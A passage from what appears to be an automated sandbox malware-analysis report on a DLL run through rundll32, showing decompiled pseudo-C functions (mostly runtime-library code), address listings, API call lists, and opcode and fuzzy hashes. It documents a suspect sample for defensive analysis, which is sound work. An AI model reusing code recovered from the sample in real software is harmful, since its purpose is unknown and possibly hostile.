								goto L12;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L15;
						}
						_t18 = E6E77D2F8(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = E6E77D2F8(_t23, L"ext-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L10;
					}
					if(_t32 == 0xffffffff) {
						goto L15;
					}
					goto L14;
				}
				_t16 = 0;
				goto L18;
			}














                                                      0x6e77d6d7
                                                      0x6e77d781
                                                      0x6e77d6df
                                                      0x6e77d6e1
                                                      0x6e77d6e8
                                                      0x6e77d6ea
                                                      0x6e77d6f0
                                                      0x6e77d6fd
                                                      0x6e77d70c
                                                      0x6e77d712
                                                      0x6e77d716
                                                      0x6e77d768
                                                      0x6e77d768
                                                      0x6e77d76d
                                                      0x6e77d771
                                                      0x6e77d774
                                                      0x6e77d774
                                                      0x6e77d77a
                                                      0x6e77d77c
                                                      0x6e77d791
                                                      0x6e77d78c
                                                      0x6e77d790
                                                      0x6e77d790
                                                      0x6e77d77e
                                                      0x6e77d77e
                                                      0x00000000
                                                      0x6e77d77e
                                                      0x6e77d718
                                                      0x6e77d721
                                                      0x6e77d758
                                                      0x6e77d758
                                                      0x6e77d75a
                                                      0x6e77d75c
                                                      0x00000000
                                                      0x00000000
                                                      0x6e77d764
                                                      0x00000000
                                                      0x6e77d764
                                                      0x6e77d72b
                                                      0x6e77d730
                                                      0x6e77d735
                                                      0x00000000
                                                      0x00000000
                                                      0x6e77d73f
                                                      0x6e77d744
                                                      0x6e77d749
                                                      0x00000000
                                                      0x00000000
                                                      0x6e77d74e
                                                      0x6e77d754
                                                      0x00000000
                                                      0x6e77d754
                                                      0x6e77d6f5
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x6e77d6fb
                                                      0x6e77d78a
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: api-ms-$ext-ms-
                                                      • API String ID: 0-537541572
                                                      • Opcode ID: 91891a6f49bfa9802c7f187902a2fe06bbd8106904ab37b9bc1c3423d7e9a2d6
                                                      • Instruction ID: d2e4586332f2218cf190cde73a788ec0b924a471af2b0ffab6328ed153ff5514
                                                      • Opcode Fuzzy Hash: 91891a6f49bfa9802c7f187902a2fe06bbd8106904ab37b9bc1c3423d7e9a2d6
                                                      • Instruction Fuzzy Hash: 3621A871A45611ABDF314AF99E44A4B776C9F13771F210530EF1AAB2A4D630ED00CEE9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7F965C, Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,00000000,00000000,6E7B79EA,?,?,?,6E7F98AD,00000001,00000001,9F418D08), ref: 6E7F96B6
                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,6E7F98AD,00000001,00000001,9F418D08,00000000,?,?), ref: 6E7F973C
                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,00000000,9F418D08,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 6E7F9836
                                                      • __freea.LIBCMT ref: 6E7F9843
                                                        • Part of subcall function 6E7F99F0: RtlAllocateHeap.NTDLL(00000000,00000001,?), ref: 6E7F9A22
                                                      • __freea.LIBCMT ref: 6E7F984C
                                                      • __freea.LIBCMT ref: 6E7F9871
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1414292761-0
                                                      • Opcode ID: 2d392bd486ac6df42ec7408af98eb988146bf84e6470258071eafca25ee13cc7
                                                      • Instruction ID: 425c513151dc429a25491d9eb3414fa36b03f31a0ee91a401f4080c76ec76f8c
                                                      • Opcode Fuzzy Hash: 2d392bd486ac6df42ec7408af98eb988146bf84e6470258071eafca25ee13cc7
                                                      • Instruction Fuzzy Hash: 0F510072A10207EEEB158EE9CE44EEB77B9EF54614F110638FD14D6260EB35DC42CAA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7EAFAB, Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: __cftoe
                                                      • String ID:
                                                      • API String ID: 4189289331-0
                                                      • Opcode ID: 2f7a11f6d21bd8f095e97c9b57d584175ce5ad8d4aabdce721f2a8e69067b073
                                                      • Instruction ID: 7f8855d98fc75fb002c6f22e1ebf8004022a034582263d722e2dc0bc2be08af7
                                                      • Opcode Fuzzy Hash: 2f7a11f6d21bd8f095e97c9b57d584175ce5ad8d4aabdce721f2a8e69067b073
                                                      • Instruction Fuzzy Hash: 59512D32504305EBDB748FE99E44EAE7BBCDF49374F104629E834926B9EB31F5018A64
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E79FC60, Relevance: 9.1, APIs: 6, Instructions: 143COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 6E79FCA7
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 6E79FCC9
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 6E79FCF1
                                                      • __Getctype.LIBCPMT ref: 6E79FDC1
                                                      • std::_Facet_Register.LIBCPMT ref: 6E79FDF5
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 6E79FE27
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                                      • String ID:
                                                      • API String ID: 1102183713-0
                                                      • Opcode ID: f485d549c44b93dbc6bf9ccbab61aba062bc379e90c34072d616eb4cfb2e7f12
                                                      • Instruction ID: d513e717e30998cfb1594cb8e55156180d3eb6eee29d45cab50a03943054f189
                                                      • Opcode Fuzzy Hash: f485d549c44b93dbc6bf9ccbab61aba062bc379e90c34072d616eb4cfb2e7f12
                                                      • Instruction Fuzzy Hash: 4D51CBB0904605CFDB14CFA8C644BAEBBF4EF01314F2485A9E855AB3A1DB74AA05CFD1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E77B0A7, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E6E77B0A7(void* __ecx, signed int* _a4, intOrPtr _a8) {
				WCHAR* _v8;
				signed int _t11;
				WCHAR* _t12;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t16;
				struct HINSTANCE__* _t18;
				signed int* _t22;
				signed int* _t26;
				struct HINSTANCE__* _t29;
				WCHAR* _t31;
				void* _t32;

				_t26 = _a4;
				while(_t26 != _a8) {
					_t11 =  *_t26;
					_t22 = 0x6e78cd4c + _t11 * 4;
					_t29 =  *_t22;
					if(_t29 == 0) {
						_t12 =  *(0x6e785c3c + _t11 * 4);
						_v8 = _t12;
						_t13 = LoadLibraryExW(_t12, 0, 0x800); // executed
						_t29 = _t13;
						if(_t29 != 0) {
							L13:
							 *_t22 = _t29;
							if( *_t22 != 0) {
								FreeLibrary(_t29);
							}
							L15:
							_t16 = _t29;
							L12:
							return _t16;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L8:
							 *_t22 = _t18 | 0xffffffff;
							L9:
							_t26 =  &(_t26[1]);
							continue;
						}
						_t31 = _v8;
						_t18 = E6E77D2F8(_t31, L"api-ms-", 7);
						_t32 = _t32 + 0xc;
						if(_t18 == 0) {
							goto L8;
						}
						_t18 = LoadLibraryExW(_t31, 0, 0);
						_t29 = _t18;
						if(_t29 != 0) {
							goto L13;
						}
						goto L8;
					}
					if(_t29 != 0xffffffff) {
						goto L15;
					}
					goto L9;
				}
				_t16 = 0;
				goto L12;
			}














                                                      0x6e77b0ae
                                                      0x6e77b122
                                                      0x6e77b0b3
                                                      0x6e77b0b5
                                                      0x6e77b0bc
                                                      0x6e77b0c0
                                                      0x6e77b0c9
                                                      0x6e77b0d8
                                                      0x6e77b0db
                                                      0x6e77b0e1
                                                      0x6e77b0e5
                                                      0x6e77b12e
                                                      0x6e77b130
                                                      0x6e77b134
                                                      0x6e77b137
                                                      0x6e77b137
                                                      0x6e77b13d
                                                      0x6e77b13d
                                                      0x6e77b129
                                                      0x6e77b12d
                                                      0x6e77b12d
                                                      0x6e77b0e7
                                                      0x6e77b0f0
                                                      0x6e77b11a
                                                      0x6e77b11d
                                                      0x6e77b11f
                                                      0x6e77b11f
                                                      0x00000000
                                                      0x6e77b11f
                                                      0x6e77b0f2
                                                      0x6e77b0fd
                                                      0x6e77b102
                                                      0x6e77b107
                                                      0x00000000
                                                      0x00000000
                                                      0x6e77b10e
                                                      0x6e77b114
                                                      0x6e77b118
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x6e77b118
                                                      0x6e77b0c5
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x6e77b0c7
                                                      0x6e77b127
                                                      0x00000000

                                                      APIs
                                                      • FreeLibrary.KERNEL32(00000000,?,?,6E77B168,00000000,?,00000001,00000000,?,6E77B1DF,00000001,FlsFree,6E785CF8,FlsFree,00000000), ref: 6E77B137
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: FreeLibrary
                                                      • String ID: api-ms-
                                                      • API String ID: 3664257935-2084034818
                                                      • Opcode ID: 156b454ff2e4377ff8d97e53f2103e6ea21beef52479c80121f5deaf8f9d63b1
                                                      • Instruction ID: 6f16618b87acb166bf23d4beb87756fcda4b72bfe92e25bebb9933b716a44a73
                                                      • Opcode Fuzzy Hash: 156b454ff2e4377ff8d97e53f2103e6ea21beef52479c80121f5deaf8f9d63b1
                                                      • Instruction Fuzzy Hash: D1110A31A41625ABDF324AA8AD41B8E37B99F03770F210130E911EB2D8D770FD008ED1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7F8BC3, Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: _free$AllocateHeap
                                                      • String ID:
                                                      • API String ID: 3033488037-0
                                                      • Opcode ID: 8e9f2bdb1086090a71c483e8ebf33699f0cfe47c70e61d60e21e588624315b76
                                                      • Instruction ID: 81c9ae4895dbc1094604106bdb0b2bcd17e9d1833337f148a999c249bff06ef6
                                                      • Opcode Fuzzy Hash: 8e9f2bdb1086090a71c483e8ebf33699f0cfe47c70e61d60e21e588624315b76
                                                      • Instruction Fuzzy Hash: F251D631A05705DFE751DFAACE40A9A77F8EF59724B000AA9E819DB364E731D902CF40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E778E65, Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      C-Code - Quality: 86%
                                                      			E6E778E65(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t24;
				signed int _t25;
				signed int _t26;
				signed int _t29;
				signed int _t35;
				void* _t37;
				void* _t40;
				signed int _t42;
				signed int _t45;
				void* _t47;
				void* _t52;

				_t40 = __edx;
				E6E7794D0(__ebx, __edi, __esi, 0x6e78a4d0, 0xc);
				_t42 =  *(_t47 + 0xc);
				if(_t42 != 0) {
					L3:
					 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
					__eflags = _t42 - 1;
					if(_t42 == 1) {
						L6:
						_t35 =  *(_t47 + 0x10);
						_t45 = E6E778F70( *((intOrPtr*)(_t47 + 8)), _t42, _t35);
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t45;
						if(_t45 == 0) {
							L16:
							 *(_t47 - 4) = 0xfffffffe;
							_t24 = _t45;
							L17:
							 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0x10));
							return _t24;
						}
						_t25 = E6E778C5B(_t35, _t37, _t40, _t42, _t45,  *((intOrPtr*)(_t47 + 8)), _t42, _t35); // executed
						_t45 = _t25;
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t45;
						if(_t45 == 0) {
							goto L16;
						}
						L8:
						_push(_t35);
						_push(_t42);
						_push( *((intOrPtr*)(_t47 + 8)));
						_t26 = E6E7795AE();
						_t45 = _t26;
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t42 - 1;
						if(_t42 == 1) {
							__eflags = _t45;
							if(_t45 == 0) {
								_push(_t35);
								_push(_t26);
								_push( *((intOrPtr*)(_t47 + 8)));
								_t29 = E6E7795AE();
								__eflags = _t35;
								_t14 = _t35 != 0;
								__eflags = _t14;
								_push((_t29 & 0xffffff00 | _t14) & 0x000000ff);
								E6E778DB5(_t35, _t40, _t42, _t45, _t14);
								_pop(_t37);
								E6E778F70( *((intOrPtr*)(_t47 + 8)), _t45, _t35);
							}
						}
						__eflags = _t42;
						if(_t42 == 0) {
							L13:
							_t45 = E6E778C5B(_t35, _t37, _t40, _t42, _t45,  *((intOrPtr*)(_t47 + 8)), _t42, _t35);
							 *(_t47 - 0x1c) = _t45;
							__eflags = _t45;
							if(_t45 != 0) {
								_t45 = E6E778F70( *((intOrPtr*)(_t47 + 8)), _t42, _t35);
								 *(_t47 - 0x1c) = _t45;
							}
							goto L16;
						} else {
							__eflags = _t42 - 3;
							if(_t42 != 3) {
								goto L16;
							}
							goto L13;
						}
					}
					__eflags = _t42 - 2;
					if(_t42 == 2) {
						goto L6;
					}
					_t35 =  *(_t47 + 0x10);
					goto L8;
				}
				_t52 =  *0x6e78c984 - _t42; // 0x1
				if(_t52 > 0) {
					goto L3;
				}
				_t24 = 0;
				goto L17;
			}














                                                      0x6e778e65
                                                      0x6e778e6c
                                                      0x6e778e71
                                                      0x6e778e76
                                                      0x6e778e87
                                                      0x6e778e87
                                                      0x6e778e8b
                                                      0x6e778e8e
                                                      0x6e778e9a
                                                      0x6e778e9a
                                                      0x6e778ea7
                                                      0x6e778ea9
                                                      0x6e778eac
                                                      0x6e778eae
                                                      0x6e778f57
                                                      0x6e778f57
                                                      0x6e778f5e
                                                      0x6e778f60
                                                      0x6e778f63
                                                      0x6e778f6f
                                                      0x6e778f6f
                                                      0x6e778eb9
                                                      0x6e778ebe
                                                      0x6e778ec0
                                                      0x6e778ec3
                                                      0x6e778ec5
                                                      0x00000000
                                                      0x00000000
                                                      0x6e778ecb
                                                      0x6e778ecb
                                                      0x6e778ecc
                                                      0x6e778ecd
                                                      0x6e778ed0
                                                      0x6e778ed5
                                                      0x6e778ed7
                                                      0x6e778eda
                                                      0x6e778edd
                                                      0x6e778edf
                                                      0x6e778ee1
                                                      0x6e778ee3
                                                      0x6e778ee4
                                                      0x6e778ee5
                                                      0x6e778ee8
                                                      0x6e778eed
                                                      0x6e778eef
                                                      0x6e778eef
                                                      0x6e778ef5
                                                      0x6e778ef6
                                                      0x6e778efb
                                                      0x6e778f01
                                                      0x6e778f01
                                                      0x6e778ee1
                                                      0x6e778f06
                                                      0x6e778f08
                                                      0x6e778f0f
                                                      0x6e778f19
                                                      0x6e778f1b
                                                      0x6e778f1e
                                                      0x6e778f20
                                                      0x6e778f2c
                                                      0x6e778f54
                                                      0x6e778f54
                                                      0x00000000
                                                      0x6e778f0a
                                                      0x6e778f0a
                                                      0x6e778f0d
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x6e778f0d
                                                      0x6e778f08
                                                      0x6e778e90
                                                      0x6e778e93
                                                      0x00000000
                                                      0x00000000
                                                      0x6e778e95
                                                      0x00000000
                                                      0x6e778e95
                                                      0x6e778e78
                                                      0x6e778e7e
                                                      0x00000000
                                                      0x00000000
                                                      0x6e778e80
                                                      0x00000000

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: dllmain_raw$dllmain_crt_dispatch
                                                      • String ID:
                                                      • API String ID: 3136044242-0
                                                      • Opcode ID: 89b523d4f0a37851d0bcd952d91c42dc28c419e5309eedf3f9dbf057e5bb2bfe
                                                      • Instruction ID: b3b96f15fee1fdd82b761205b310054fab4ddaa85929cd9f0211ab0ebbe1babb
                                                      • Opcode Fuzzy Hash: 89b523d4f0a37851d0bcd952d91c42dc28c419e5309eedf3f9dbf057e5bb2bfe
                                                      • Instruction Fuzzy Hash: 0721B171E05636AFEF714E95CE44AAF3A7ADF80794F014925F81867234C3308E01CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E773082, Relevance: 7.6, APIs: 6, Instructions: 86memorystringCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 95%
                                                      			E6E773082(void* __eflags, CHAR* _a4, CHAR* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t28;
				int _t37;
				long _t38;
				void* _t39;
				CHAR* _t50;
				signed int _t61;
				signed int _t62;

				_t28 =  *0x6e78c00c; // 0x9bbef7a8
				_v8 = _t28 ^ _t62;
				_v20 = _v20 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_t50 = _a4;
				_t60 = _a8;
				_t59 = lstrlenA;
				_t58 = lstrlenA(_a8);
				if(E6E772C18(_a8, _t32,  &_v20,  &_v24) != 0) {
					_v16 = _v16 & 0x00000000;
					_v12 = _v12 & 0x00000000;
					_t37 = lstrlenA(_t50);
					_t38 = E6E773015(); // executed
					_t56 = _t38;
					_t39 = E6E77268B(_t38, _t50, _t37,  &_v16,  &_v12);
					_t59 = HeapFree;
					_t50 = GetProcessHeap;
					if(_t39 != 0) {
						_t61 = _v12;
						_v28 = _v16;
						if( *((intOrPtr*)(E6E773015() + 8)) != 0) {
							_t24 = E6E77111C() + 0x18; // 0x18, executed
							E6E771FFF(_t24, HeapFree,  *((intOrPtr*)(_t41 + 8)), _t56, _v28, _t61, _v20, _v24, _t56); // executed
							asm("sbb esi, esi");
							_t60 = _t61 + 1;
						} else {
							_t60 = 0;
						}
						HeapFree(GetProcessHeap(), 0, _v16);
					} else {
						_t60 = 0;
					}
					HeapFree(GetProcessHeap(), 0, _v20);
				}
				return E6E778727(_t50, _v8 ^ _t62, _t58, _t59, _t60);
			}




















                                                      0x6e773088
                                                      0x6e77308f
                                                      0x6e773092
                                                      0x6e773099
                                                      0x6e77309e
                                                      0x6e7730a2
                                                      0x6e7730a6
                                                      0x6e7730b4
                                                      0x6e7730c1
                                                      0x6e7730c7
                                                      0x6e7730ce
                                                      0x6e7730d8
                                                      0x6e7730dc
                                                      0x6e7730e1
                                                      0x6e7730e3
                                                      0x6e7730e8
                                                      0x6e7730ee
                                                      0x6e7730f6
                                                      0x6e7730ff
                                                      0x6e773102
                                                      0x6e77310e
                                                      0x6e773128
                                                      0x6e77312b
                                                      0x6e773132
                                                      0x6e773134
                                                      0x6e773110
                                                      0x6e773110
                                                      0x6e773110
                                                      0x6e77313d
                                                      0x6e7730f8
                                                      0x6e7730f8
                                                      0x6e7730f8
                                                      0x6e773147
                                                      0x6e773149
                                                      0x6e773159

                                                      APIs
                                                      • lstrlenA.KERNEL32(?,00000000,?), ref: 6E7730B2
                                                        • Part of subcall function 6E772C18: GetProcessHeap.KERNEL32(00000000,?), ref: 6E772C5D
                                                        • Part of subcall function 6E772C18: HeapAlloc.KERNEL32(00000000), ref: 6E772C64
                                                        • Part of subcall function 6E772C18: GetProcessHeap.KERNEL32(00000000,00000000), ref: 6E772C91
                                                        • Part of subcall function 6E772C18: HeapFree.KERNEL32(00000000), ref: 6E772C98
                                                      • lstrlenA.KERNEL32(?,00000000,?), ref: 6E7730D8
                                                        • Part of subcall function 6E773015: __EH_prolog3.LIBCMT ref: 6E77301C
                                                        • Part of subcall function 6E77268B: lstrcpyW.KERNEL32(?,00000034), ref: 6E772773
                                                        • Part of subcall function 6E77268B: GetProcessHeap.KERNEL32(00000000,?), ref: 6E7727AF
                                                        • Part of subcall function 6E77268B: HeapAlloc.KERNEL32(00000000), ref: 6E7727B2
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6E77313A
                                                      • HeapFree.KERNEL32(00000000), ref: 6E77313D
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6E773144
                                                      • HeapFree.KERNEL32(00000000), ref: 6E773147
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: Heap$Process$Free$Alloclstrlen$H_prolog3lstrcpy
                                                      • String ID:
                                                      • API String ID: 558277314-0
                                                      • Opcode ID: 7af3496b7f44713efd601066a081dc3843d6be5d8c1eef30f618d5541b7902ca
                                                      • Instruction ID: 136c0d315d5efe396798de96a65a29bef5a9076fa9858e26d5527614dfd5213a
                                                      • Opcode Fuzzy Hash: 7af3496b7f44713efd601066a081dc3843d6be5d8c1eef30f618d5541b7902ca
                                                      • Instruction Fuzzy Hash: AE214872A10219ABDF20DFE4DD49BEFB7BDEF09314F114869E501A7160DB74AA04CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E8041B4, Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetEnvironmentStringsW.KERNEL32 ref: 6E8041BD
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6E8041E0
                                                        • Part of subcall function 6E7F99F0: RtlAllocateHeap.NTDLL(00000000,00000001,?), ref: 6E7F9A22
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 6E804206
                                                      • _free.LIBCMT ref: 6E804219
                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6E804228
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                      • String ID:
                                                      • API String ID: 336800556-0
                                                      • Opcode ID: 7ae86fc00dca98eac2f1818989280943e8c419b519e6148b3164836df868f4e1
                                                      • Instruction ID: 04544cfaad6c0dbe0afb73563ce9cc0fff38f908ec3154e999353738431a4345
                                                      • Opcode Fuzzy Hash: 7ae86fc00dca98eac2f1818989280943e8c419b519e6148b3164836df868f4e1
                                                      • Instruction Fuzzy Hash: 6101D472781B167F27124AFA6D8CCBF2A6DCED7AA53110928FC24C3240EA618C03C1F0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7FC43F, Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,6E849074,00000000,00000000,?,6E7FC3E6,6E849074,00000000,00000000,00000000,?,6E7FC77D,00000006,6E81CAE8), ref: 6E7FC471
                                                      • GetLastError.KERNEL32(?,6E7FC3E6,6E849074,00000000,00000000,00000000,?,6E7FC77D,00000006,6E81CAE8,6E81CAE0,6E81CAE8,00000000,00000364,?,6E7F7DF3), ref: 6E7FC47D
                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,6E7FC3E6,6E849074,00000000,00000000,00000000,?,6E7FC77D,00000006,6E81CAE8,6E81CAE0,6E81CAE8,00000000), ref: 6E7FC48B
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad$ErrorLast
                                                      • String ID:
                                                      • API String ID: 3177248105-0
                                                      • Opcode ID: c1296c4d7a57658e65a9079248e350c1615b0bbdb0b9a93764e23039be4d2dca
                                                      • Instruction ID: de2adc53737dc98ab7c00053bb9c5f5a5319815865048fadb258ba3fd066fc02
                                                      • Opcode Fuzzy Hash: c1296c4d7a57658e65a9079248e350c1615b0bbdb0b9a93764e23039be4d2dca
                                                      • Instruction Fuzzy Hash: 1701B536655623EFCF118AED8D459B67B98AF06BA27100620F919DB640D624D403CAE8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E79748B, Relevance: 5.2, APIs: 1, Strings: 2, Instructions: 659sleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Sleep.KERNEL32(00000088), ref: 6E7979E2
                                                        • Part of subcall function 6E7967F0: VirtualProtect.KERNEL32(6E856C9C,0000312B,00000040,6E856C90), ref: 6E796864
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: ProtectSleepVirtual
                                                      • String ID: $$9
                                                      • API String ID: 4088328274-1860722304
                                                      • Opcode ID: 2fb97b2e7f95eccfcbc1aae3a4de135ed7bb8d6c4a027d15caf337d8b6c82eb5
                                                      • Instruction ID: e2ac7b333284afbd48dfd96b40b11c2e41116c61a94105a4cf3054748261d2b0
                                                      • Opcode Fuzzy Hash: 2fb97b2e7f95eccfcbc1aae3a4de135ed7bb8d6c4a027d15caf337d8b6c82eb5
                                                      • Instruction Fuzzy Hash: 6952C0B1A09752CFCB08CF6CDAA0569BBE1FFDA304F084A6DE09947395D7349509CB92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7766B9, Relevance: 5.1, APIs: 4, Instructions: 54memoryCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 94%
                                                      			E6E7766B9(void* __edi, void* __eflags) {
				void* _t5;
				void* _t17;
				signed int _t19;
				signed int _t28;
				void* _t29;
				void* _t31;
				void* _t33;

				_t29 = __edi;
				_t5 = E6E77111C(); // executed
